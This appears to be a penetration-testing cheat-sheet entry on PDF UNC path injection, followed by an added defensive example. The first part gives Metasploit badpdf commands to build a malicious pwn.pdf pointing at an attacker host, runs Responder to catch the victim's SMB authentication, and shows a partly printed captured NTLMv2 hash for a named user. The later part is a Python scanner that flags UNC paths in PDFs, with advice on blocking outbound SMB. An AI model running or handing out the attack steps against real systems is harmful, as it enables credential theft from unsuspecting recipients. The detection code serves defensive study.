.pdf UNC path injection
Used to potentially grab NTLM hashes.
Metasploit offers a module for this:
msf6 > use auxiliary/fileformat/badpdf
msf6 auxiliary(fileformat/badpdf) > options
msf6 auxiliary(fileformat/badpdf) > set FILENAME pwn
msf6 auxiliary(fileformat/badpdf) > set LHOST 10.10.14.15
LHOST => 10.10.14.15
msf6 auxiliary(fileformat/badpdf) > set FILENAME pwn.pdf
FILENAME => pwn.pdf
msf6 auxiliary(fileformat/badpdf) > exploit
[+] pwn.pdf stored at /home/kali/.msf4/local/pwn.pdf
[*] Auxiliary module execution completed
Run Responder to host an SMB server and send the .pdf file to the victim:
sudo responder -I tun0
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.110.35
[SMB] NTLMv2-SSP Username : PAINTERS\riley
[SMB] NTLMv2-SSP Hash : riley::PAINTERS:060d714a7844b
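A defensive check for the kind of file described above, as an added example that is not part of the original notes: it scans a PDF's uncompressed objects for literal strings holding a UNC path, the value that makes the reader authenticate to a remote SMB host. The function names and the sample bytes are constructed for illustration; objects inside compressed streams would need inflating first.

```python
import re

# PDF literal strings escape a backslash as "\\", so the UNC path
# \\host\share is stored in the file as (\\\\host\\share).
# Assumption: objects are uncompressed and strings have no nested parentheses.
LITERAL = re.compile(rb"\((?:\\.|[^\\()])*\)", re.DOTALL)
UNC = re.compile(rb"^\\\\([A-Za-z0-9.\-_]+)\\([^\\]+)")


def unescape(raw: bytes) -> bytes:
    """Undo the backslash and parenthesis escapes of a PDF literal string."""
    return re.sub(rb"\\([\\()])", rb"\1", raw)


def find_unc_targets(pdf_bytes: bytes):
    """Return (offset, host, path) for every literal string that is a UNC path."""
    hits = []
    for m in LITERAL.finditer(pdf_bytes):
        value = unescape(m.group()[1:-1])  # drop the surrounding parentheses
        u = UNC.match(value)
        if u:
            hits.append((m.start(), u.group(1).decode("ascii"),
                         value.decode("latin-1")))
    return hits


# Constructed sample: one harmless string and one UNC file specification.
SAMPLE = (
    b"%PDF-1.7\n"
    b"1 0 obj\n<< /Title (Quarterly report) >>\nendobj\n"
    b"2 0 obj\n<< /F (" + rb"\\\\10.10.14.15\\share" + b") >>\nendobj\n"
)

if __name__ == "__main__":
    for offset, host, path in find_unc_targets(SAMPLE):
        print(f"offset {offset}: UNC reference to host {host} ({path})")
```

A hit on an inbound attachment is a reason to quarantine the file and to check whether outbound SMB (TCP 445) from workstations is blocked at the perimeter.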